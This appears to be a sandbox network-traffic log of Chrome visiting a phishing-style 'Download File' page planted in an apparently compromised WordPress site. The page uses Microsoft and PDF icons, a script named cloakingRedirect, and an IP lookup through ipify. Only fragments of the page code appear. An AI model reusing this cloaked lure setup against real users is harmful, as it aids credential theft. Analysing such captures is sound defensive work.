                                        2025-01-14 17:22:24 UTC1266INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 6f 72 6b 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 6c 6f 61 6b 69 6e 67 52 65 64 69 72 65 63 74 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Working...</title> <script type="text/javascript"> function cloakingRedirect() {


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649724192.124.249.1554436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:24 UTC731OUTGET /wp-admin/includes/fotex.html HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://savory-sweet-felidae-psrnd.glitch.me/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:25 UTC468INHTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 5875
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 14 Jan 2025 14:05:32 GMT
                                        ETag: "2a2003c-16f3-62bab0ddb875b"
                                        Vary: Accept-Encoding
                                        X-Sucuri-Cache: BYPASS
                                        Accept-Ranges: bytes
                                        2025-01-14 17:22:25 UTC5875INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 77 6e 6c 6f 61 64 20 46 69 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Download File</title> <style> body { margin: 0; padding: 0;


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.649731185.15.59.2404436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:25 UTC623OUTGET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:26 UTC1080INHTTP/1.1 200 OK
                                        date: Mon, 13 Jan 2025 22:03:28 GMT
                                        server: ATS/9.2.6
                                        etag: W/363fdd53d34303b727d9dab161b8e88b
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                        last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                        vary: Accept-Encoding
                                        age: 69537
                                        x-cache: cp3075 hit, cp3075 hit/464
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 272
                                        connection: close
                                        2025-01-14 17:22:26 UTC272INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 66 33 66 33 22 20 64 3d 22 4d 30 20 30 68 32 33 76 32 33 48 30 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 35 33 32 35 22 20 64 3d 22 4d 31 20 31 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 38 31 62 63 30 36 22 20 64 3d 22 4d 31 32 20 31 68 31 30 76 31 30 48 31 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 35 61 36 66 30 22 20 64 3d 22 4d 31 20 31 32 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 62 61 30 38 22 20 64 3d 22 4d 31 32 20 31 32 68 31
                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.649730185.15.59.2404436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:25 UTC622OUTGET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:26 UTC1081INHTTP/1.1 200 OK
                                        date: Tue, 14 Jan 2025 07:47:37 GMT
                                        server: ATS/9.2.6
                                        etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                        last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                        vary: Accept-Encoding
                                        age: 34489
                                        x-cache: cp3075 hit, cp3075 hit/196
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 5094
                                        connection: close
                                        2025-01-14 17:22:26 UTC5094INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 35 2e 33 32 30 31 32 39 6d 6d 22 20 68 65 69 67 68 74 3d 22 39 32 2e 36 30 34 31 36 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 35 2e 33 32 30 31 32 39 20 39 32 2e 36 30 34 31 36 34 22 3e 0a 20 20 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 35 33 2e 35 34 38 30 35 37 20 2d 31 38 33 2e 39 37 35 32 37 36 29 20 73 63 61 6c 65 28 31 2e 34 38 34 33 29 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66
                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.649723192.124.249.1554436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:26 UTC620OUTGET /favicon.ico HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC630INHTTP/1.1 302 Found
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Link: <https://www.nordicplow.com/wp-json/>; rel="https://api.w.org/"
                                        X-Redirect-By: WordPress
                                        Location: https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png
                                        Vary: Accept-Encoding
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: MISS


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.649740185.15.59.2404436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:27 UTC385OUTGET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC1080INHTTP/1.1 200 OK
                                        date: Mon, 13 Jan 2025 22:03:28 GMT
                                        server: ATS/9.2.6
                                        etag: W/363fdd53d34303b727d9dab161b8e88b
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                        last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                        vary: Accept-Encoding
                                        age: 69538
                                        x-cache: cp3075 hit, cp3075 hit/465
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 272
                                        connection: close
                                        2025-01-14 17:22:27 UTC272INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 66 33 66 33 22 20 64 3d 22 4d 30 20 30 68 32 33 76 32 33 48 30 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 35 33 32 35 22 20 64 3d 22 4d 31 20 31 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 38 31 62 63 30 36 22 20 64 3d 22 4d 31 32 20 31 68 31 30 76 31 30 48 31 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 35 61 36 66 30 22 20 64 3d 22 4d 31 20 31 32 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 62 61 30 38 22 20 64 3d 22 4d 31 32 20 31 32 68 31
                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.649741185.15.59.2404436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:27 UTC384OUTGET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC1081INHTTP/1.1 200 OK
                                        date: Tue, 14 Jan 2025 07:47:37 GMT
                                        server: ATS/9.2.6
                                        etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                        last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                        vary: Accept-Encoding
                                        age: 34490
                                        x-cache: cp3075 hit, cp3075 hit/197
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 5094
                                        connection: close
                                        2025-01-14 17:22:27 UTC5094INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 35 2e 33 32 30 31 32 39 6d 6d 22 20 68 65 69 67 68 74 3d 22 39 32 2e 36 30 34 31 36 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 35 2e 33 32 30 31 32 39 20 39 32 2e 36 30 34 31 36 34 22 3e 0a 20 20 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 35 33 2e 35 34 38 30 35 37 20 2d 31 38 33 2e 39 37 35 32 37 36 29 20 73 63 61 6c 65 28 31 2e 34 38 34 33 29 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66
                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.649748192.124.249.1554436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:27 UTC652OUTGET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC516INHTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:27 GMT
                                        Content-Type: image/png
                                        Content-Length: 4119
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
                                        ETag: "24e0310-1017-5d0dca9a37e40"
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: HIT
                                        Accept-Ranges: bytes
                                        2025-01-14 17:22:27 UTC4119INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 50 08 06 00 00 00 8e 11 f2 ad 00 00 0f de 49 44 41 54 78 da e5 5d 09 78 55 c5 15 0e 5b c1 c8 56 10 d1 2a 29 9b 4b 6b ad c5 da 56 ad 6b b5 1b 4a 5d 6a 4b 45 6c 3f f5 ab b5 74 b7 04 12 21 09 7b 14 2c a0 a2 11 45 83 d9 13 b2 90 90 1d 92 40 c0 b0 84 b0 46 90 25 04 08 81 10 12 42 16 12 b2 4e e7 bf 79 93 cc 9d 77 97 b9 f7 bd 87 49 7b be 6f be f0 de 9b 3b cb b9 73 e6 9c f3 9f 33 83 97 d7 57 48 d7 cf 8b 1b ff ad a5 c9 2f d3 b2 7a 42 70 d2 96 6f 2c 58 57 f2 f5 80 98 9a 81 b3 23 5a bd 66 86 11 be 7c 6d 76 44 f3 d0 39 d1 17 46 06 c6 1c a2 cf a5 8d 08 8c 79 ab 9f 6f f8 b3 f4 b7 31 5e ff 37 34 33 6c d8 d8 c5 09 af de f9 76 ca e7 23 03 63 1b 45 26 f1 65 d8 dc 68 55 31 aa 7b 8d 7f e4 05 ca e0 08 fa ef
                                        Data Ascii: PNGIHDRPPIDATx]xU[V*)KkVkJ]jKEl?t!{,E@F%BNywI{o;s3WH/zBpo,XW#Zf|mvD9Fyo1^743lv#cE&ehU1{


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.649751192.124.249.1554436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:28 UTC385OUTGET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:28 UTC516INHTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:28 GMT
                                        Content-Type: image/png
                                        Content-Length: 4119
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
                                        ETag: "24e0310-1017-5d0dca9a37e40"
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: HIT
                                        Accept-Ranges: bytes
                                        2025-01-14 17:22:28 UTC4119INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 50 08 06 00 00 00 8e 11 f2 ad 00 00 0f de 49 44 41 54 78 da e5 5d 09 78 55 c5 15 0e 5b c1 c8 56 10 d1 2a 29 9b 4b 6b ad c5 da 56 ad 6b b5 1b 4a 5d 6a 4b 45 6c 3f f5 ab b5 74 b7 04 12 21 09 7b 14 2c a0 a2 11 45 83 d9 13 b2 90 90 1d 92 40 c0 b0 84 b0 46 90 25 04 08 81 10 12 42 16 12 b2 4e e7 bf 79 93 cc 9d 77 97 b9 f7 bd 87 49 7b be 6f be f0 de 9b 3b cb b9 73 e6 9c f3 9f 33 83 97 d7 57 48 d7 cf 8b 1b ff ad a5 c9 2f d3 b2 7a 42 70 d2 96 6f 2c 58 57 f2 f5 80 98 9a 81 b3 23 5a bd 66 86 11 be 7c 6d 76 44 f3 d0 39 d1 17 46 06 c6 1c a2 cf a5 8d 08 8c 79 ab 9f 6f f8 b3 f4 b7 31 5e ff 37 34 33 6c d8 d8 c5 09 af de f9 76 ca e7 23 03 63 1b 45 26 f1 65 d8 dc 68 55 31 aa 7b 8d 7f e4 05 ca e0 08 fa ef
                                        Data Ascii: PNGIHDRPPIDATx]xU[V*)KkVkJ]jKEl?t!{,E@F%BNywI{o;s3WH/zBpo,XW#Zf|mvD9Fyo1^743lv#cE&ehU1{


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.649827104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:39 UTC559OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:39 UTC463INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:39 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f32ee1e43fe-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1623&rtt_var=611&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1137&delivery_rate=1789215&cwnd=227&unsent_bytes=0&cid=30d47e566c6620ba&ts=136&x=0"
                                        2025-01-14 17:22:39 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.649832104.26.12.2054436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:39 UTC349OUTGET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
